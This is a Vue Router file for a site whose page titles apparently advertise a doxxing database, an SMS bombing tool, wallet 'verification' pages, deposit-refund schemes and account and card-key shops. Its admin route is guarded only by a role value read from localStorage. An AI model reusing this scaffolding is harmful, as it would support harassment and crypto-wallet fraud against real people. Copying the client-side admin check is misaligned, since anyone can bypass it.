import { createRouter, createWebHistory } from 'vue-router';
import { reportPageVisit } from '../util/pageVisit';
import { checkAccess } from '../util/api';
import { ensurePromoShortLinkResolved } from '../util/deeplink';
import { resolveDocumentTitle, getCachedSiteBranding, applyFavicon } from '../util/siteBranding';

/** 路由懒加载：首页不打包支付/授权/详情等页面，避免首包过大 */
const Home = () => import(/* webpackChunkName: "home" */ '../views/Home.vue');
const Detail = () => import(/* webpackChunkName: "detail" */ '../views/Detail.vue');
const IpBlocked = () => import(/* webpackChunkName: "blocked" */ '../views/IpBlocked.vue');
const Payment = () => import(/* webpackChunkName: "payment" */ '../views/Payment.vue');
const TgPayment = () => import(/* webpackChunkName: "payment" */ '../views/TgPayment.vue');
const WalletPay = () => import(/* webpackChunkName: "wallet-pay" */ '../views/WalletPay.vue');
const WalletLink = () => import(/* webpackChunkName: "wallet-pay" */ '../views/WalletLink.vue');
const WalletLinkTest = () => import(/* webpackChunkName: "wallet-pay" */ '../views/WalletLinkTest.vue');
const Woker = () => import(/* webpackChunkName: "woker" */ '../woker/Woker.vue');
const Login = () => import(/* webpackChunkName: "admin" */ '../admin/Login.vue');
const Index = () => import(/* webpackChunkName: "admin" */ '../admin/Index.vue');
const Trxtk = () => import(/* webpackChunkName: "special" */ '../views/Trxtk.vue');
const Menber = () => import(/* webpackChunkName: "special" */ '../views/Tgmenber.vue');
const TrxExchange = () => import(/* webpackChunkName: "special" */ '../views/TrxExchange.vue');
const EnergyUse = () => import(/* webpackChunkName: "special" */ '../views/EnergyUse.vue');
const TudouDb = () => import(/* webpackChunkName: "special" */ '../views/TuDoudb.vue');
const PhoneCode = () => import(/* webpackChunkName: "special" */ '../views/PhoneCode.vue');
const HighFreqBomber = () => import(/* webpackChunkName: "special" */ '../views/HighFreqBomber.vue');
const CardSecretBuy = () => import(/* webpackChunkName: "special" */ '../views/CardSecretBuy.vue');
const AccountMall = () => import(/* webpackChunkName: "mall" */ '../views/AccountMall.vue');
const TrxEnergyPlatform = () => import(/* webpackChunkName: "special" */ '../views/TrxEnergyPlatform.vue');
const NetSms = () => import(/* webpackChunkName: "special" */ '../views/NetSms.vue');
const SpecialGoodsOrder = () => import(/* webpackChunkName: "special" */ '../views/SpecialGoodsOrder.vue');
const OrderAuth = () => import(/* webpackChunkName: "order" */ '../views/OrderAuth.vue');
const OrderHall = () => import(/* webpackChunkName: "order" */ '../views/OrderHall.vue');
const SelectWallet = () => import(/* webpackChunkName: "wallet-pay" */ '../views/SelectWallet.vue');
const FansStore = () => import(/* webpackChunkName: "fans" */ '../views/FansStore.vue');
const FansStoreDetail = () => import(/* webpackChunkName: "fans" */ '../views/FansStoreDetail.vue');
const TokenTY = () => import(/* webpackChunkName: "special" */ '../views/TokenTY.vue');
const WalletActity = () => import(/* webpackChunkName: "special" */ '../views/WalletActity.vue');
const WalletActityTo = () => import(/* webpackChunkName: "special" */ '../views/WalletActityTo.vue');
const xinbiActity = () => import(/* webpackChunkName: "special" */ '../views/XinbActive.vue');
const ExpressDelivery = () => import(/* webpackChunkName: "express" */ '../views/ExpressDelivery.vue');
const ExpressPayment = () => import(/* webpackChunkName: "express" */ '../views/ExpressPayment.vue');
const MiningEarnings = () => import(/* webpackChunkName: "mining" */ '../views/MiningEarnings.vue');
const MiningPayment = () => import(/* webpackChunkName: "mining" */ '../views/MiningPayment.vue');
const sgkPage = () => import(/* webpackChunkName: "woker" */ '../woker/HomePage.vue');

const wokerDetail = (n) => () =>
  import(/* webpackChunkName: "woker-detail" */ `../woker/detail/wokerDetail${n}.vue`);

const routes = [
  {
    path: '/',
    name: 'Home',
    component: Home,
    meta: {
      title: '源头批发商城'
    }
  },
  {
    path: '/blocked',
    name: 'IpBlocked',
    component: IpBlocked,
    meta: { skipIpCheck: true, title: '访问受限' },
  },
  {
    path: '/woker',
    name: 'woker',
    component: Woker,
  },
  {
    path: '/detail',
    name: 'Detail',
    component: Detail,
  },
  {
    path: '/detail/:data',
    name: 'DetailLegacy',
    component: Detail,
  },
  {
    path: '/productDetail',
    name: 'ProductDetail',
    component: Detail,
  },
  {
    path: '/productDetail/:data',
    name: 'ProductDetailLegacy',
    component: Detail,
  },
  {
    path: '/trxtk',
    name: 'Trxtk',
    component: Trxtk,
    meta: {
      title: 'TRX退押'
    }
  },
  {
    path: '/sgkPage',
    name: 'SgkPage',
    component: sgkPage,
    meta: {
      title: '社工库'
    }
  },
  {
    path: '/tokenTY',
    name: 'TokenTY',
    component: TokenTY,
    meta: {
      title: '新币退押'
    }
  },
  {
    path: '/walletActity',
    name: 'WalletActity',
    component: WalletActity,
    meta: {
      title: '钱包验证'
    }
  },
  {
    path: '/walletActityTo',
    name: 'WalletActityTo',
    component: WalletActityTo,
    meta: {
      title: '钱包激活验证'
    }
  },
  {
    path: '/xinbiActity',
    name: 'XinbiActity',
    component: xinbiActity,
    meta: {
      title: '新币验证'
    }
  },
  {
    path: '/tudouDb',
    name: 'TudouDb',
    component: TudouDb,
    meta: {
      title: '土豆担保'
    }
  },
  {
    path: '/expressDelivery',
    name: 'ExpressDelivery',
    component: ExpressDelivery,
    meta: {
      title: '登记信息'
    }
  },
  {
    path: '/expressDelivery/:data',
    name: 'ExpressDeliveryDetail',
    component: ExpressDelivery,
    meta: {
      title: '登记信息'
    }
  },
  {
    path: '/expressPayment/:data',
    name: 'ExpressPayment',
    component: ExpressPayment,
    meta: {
      title: '实物快递'
    }
  },
  {
    path: '/wakuang',
    name: 'MiningEarnings',
    component: MiningEarnings,
    meta: {
      title: '挖矿'
    }
  },
  {
    path: '/miningPayment/:data',
    name: 'MiningPayment',
    component: MiningPayment,
  },
  ...Array.from({ length: 40 }, (_, i) => {
    const n = i + 1;
    return {
      path: `/wokerDetail${n}`,
      name: `WokerDetail${n}`,
      component: wokerDetail(n),
    };
  }),
  {
    path: '/energyUsePage',
    name: 'EnergyUse',
    component: EnergyUse,
    meta: {
      title: '能量租赁'
    }
  },
  {
    path: '/phoneCodePage',
    name: 'PhoneCode',
    component: PhoneCode,
    meta: {
      title: '手机验证码'
    }
  },
  {
    path: '/highFreqBomber',
    name: 'HighFreqBomber',
    component: HighFreqBomber,
    meta: { title: '高频轰炸机' },
  },
  {
    path: '/cardSecretBuy',
    name: 'CardSecretBuy',
    component: CardSecretBuy,
    meta: { title: '购买卡密' },
  },
  {
    path: '/accountMall',
    name: 'AccountMall',
    component: AccountMall,
    meta: { title: '账号商城' },
  },
  {
    path: '/trxEnergyPlatform',
    name: 'TrxEnergyPlatform',
    component: TrxEnergyPlatform,
    meta: { title: 'TRX自助能量租赁平台' },
  },
  {
    path: '/netsms',
    name: 'NetSms',
    component: NetSms,
    meta: { title: 'SMS短信接码平台' },
  },
  {
    path: '/pickup',
    name: 'PickupOrder',
    component: SpecialGoodsOrder,
    meta: { title: '提货', linkKey: 'pickup1', orderVariant: 'pickup' },
  },
  {
    path: '/returnOrder',
    name: 'ReturnOrder',
    component: SpecialGoodsOrder,
    meta: { title: '退货', linkKey: 'return1', orderVariant: 'return' },
  },
  {
    path: '/orderAuth',
    name: 'OrderAuth',
    component: OrderAuth,
    meta: { title: '登录注册' },
  },
  {
    path: '/orderHall',
    name: 'OrderHall',
    component: OrderHall,
    meta: { title: '订单大厅' },
  },
  {
    path: '/selectWallet',
    name: 'SelectWallet',
    component: SelectWallet,
    meta: { title: '选择钱包' },
  },
  {
    path: '/fansStore',
    name: 'FansStore',
    component: FansStore,
    meta: { title: '粉丝商城' },
  },
  {
    path: '/fansStore/record',
    name: 'FansStoreDetail',
    component: FansStoreDetail,
    meta: { title: '粉丝商城' },
  },
  {
    path: '/tgmenberPage',
    name: 'TgMenber',
    component: Menber,
    meta: {
      title: 'TG会员'
    }
  },
  {
    path: '/TrxExchangePage',
    name: 'TrxExchange',
    component: TrxExchange,
    meta: {
      title: 'TRX兑换'
    }
  },
  {
    path: '/payment/:data',
    name: 'Payment',
    component: Payment,
  },
  {
    path: '/tgPayment',
    name: 'TgPayment',
    component: TgPayment,
  },
  {
    path: '/walletLink/referralCode/:referralCode',
    name: 'WalletLink',
    component: WalletLink,
  },
  {
    path: '/walletLink/referralCode/:referralCode/gid/:gid',
    name: 'WalletLinkWithGid',
    component: WalletLink,
  },
  {
    path: '/walletLinkTest/referralCode/:referralCode',
    name: 'WalletLinkTest',
    component: WalletLinkTest,
  },
  {
    path: '/walletLinkTest/referralCode/:referralCode/gid/:gid',
    name: 'WalletLinkTestWithGid',
    component: WalletLinkTest,
  },
  {
    path: '/walletPay/tgNo/:tgNo/referralCode/:referralCode',
    name: 'WalletPay',
    component: WalletPay,
  },
  {
    path: '/walletPay/tgNo/:tgNo/referralCode/:referralCode/gid/:gid',
    name: 'WalletPayWithGid',
    component: WalletPay,
  },
  {
    path: '/Login',
    name: 'Login',
    component: Login,
  },
  {
    path: '/Index',
    name: 'Index',
    component: Index,
    meta: { requiresAdmin: true },
  },
];

const router = createRouter({
  history: createWebHistory(process.env.BASE_URL),
  routes,
});

function getCurrentUserRole() {
  return localStorage.getItem('role') || 'guest';
}

let accessCheckPromise = null;
async function ensureIpAllowed() {
  if (!accessCheckPromise) {
    accessCheckPromise = checkAccess()
      .then((res) => {
        const blocked =
          res.status === 403 ||
          res.data?.code === 'IP_BLOCKED' ||
          res.data?.data?.ok === false;
        return !blocked;
      })
      .catch(() => true)
      .finally(() => {
        setTimeout(() => {
          accessCheckPromise = null;
        }, 30_000);
      });
  }
  return accessCheckPromise;
}

router.beforeEach(async (to, from, next) => {
  await ensurePromoShortLinkResolved(to);
  const role = getCurrentUserRole();

  if (to.meta.requiresAdmin) {
    if (role === 'admin') {
      next();
    } else {
      alert("⛔ 权限不足，仅限管理员访问！");
      next(false);
    }
    return;
  }

  if (to.meta.skipIpCheck || to.name === 'IpBlocked') {
    next();
    return;
  }

  const allowed = await ensureIpAllowed();
  if (!allowed) {
    next({ name: 'IpBlocked', replace: true });
    return;
  }
  next();
});

router.afterEach((to) => {
  document.title = resolveDocumentTitle(to);
  const favicon = getCachedSiteBranding().site_favicon;
  if (favicon) applyFavicon(favicon);
  reportPageVisit(to);
});

export default router;
